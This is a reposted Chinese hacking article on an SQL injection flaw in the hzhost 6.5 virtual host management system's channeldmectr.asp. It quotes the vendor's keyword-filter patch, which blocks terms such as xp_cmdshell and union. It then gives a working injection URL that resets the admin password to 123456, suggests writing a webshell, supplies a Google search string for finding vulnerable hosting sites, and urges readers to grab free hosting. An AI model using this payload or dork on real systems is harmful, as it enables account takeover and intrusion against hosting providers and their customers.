欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

hzhost6.5 华众虚拟主机管理系统最新SQL漏洞(附漏洞补丁)

程序员文章站 2022-12-18 20:59:36
其实呢,漏洞一点都不新,在t00ls都躺了N天了,就是不见有人转出来..没记错的话这已经是华众第四次出漏洞了..而且每次犯的还都是一个毛病,我很看好他们的程序员. ... 09-07-20...
这次漏洞出在channeldmectr.asp这个文件上,跟本就没有过滤任何参数.
正好我这里有正版的补丁,打开看下了,打上补丁的channeldmectr.asp文件在第21行到第40行,增加了以下代码:

复制代码
代码如下:

function saferequest(paraname)
dim paravalue
paravalue=request(paraname)
if isnumeric(paravalue) then
saferequest=paravalue
exit function
else
paravaluetemp=lcase(paravalue)
tempvalue="select|insert|delete|union|
join|script|applet|object|’|drop|update|truncate|
create|xp_cmdshell|exec|alter|cast|rename|modify”
temps=split(tempvalue,”|”)
for mycount=0 to ubound(temps)
if instr(paravaluetemp,temps(mycount)) > 0 and lcase(paraname)<>”module” then
call errorpage(-2,”您提交的内容包含了字符["&temps(mycount)&"],请去除后重新提交或联系我们…”)
response.end
end if
next
saferequest=paravalue
end if
end function

代码的大概意思是对其中红色部分的参数进行过滤,禁止提交,防止执行构造好的sql语句.
利用方法如下:
http://www.xxx.com/incs/channeldmectr.asp?domainname=1′);{我们构造的语句}–
下面给出一个示范语句:
http://www.xxx.com/incs/channeldmectr.asp?domainname=1′);update [memlst] set u_pss=’e10adc3949ba59abbe56e057f20f883e’ where u_nme=’admin’–
语句的意思是将管理员账号admin的密码改为123456.
当然大家也可以灵活运用,构造其他语句,比如写一句话马进去之类的,这里省略.
最后丢个关键词给大家,google搜索inurl:pdtshw/hstshw会出来大批的使用华众平台的idc站点..转自www.hacksb.cn
我这个人比较善良,放出独家收藏华众近期出现的所有漏洞的补丁,有需要的朋友可以下载.
ok,就介绍到这里,想拿免费空间的淫们现在也可以行动了..

(本文为普瑞斯特编辑整理) http://www.hacksb.cn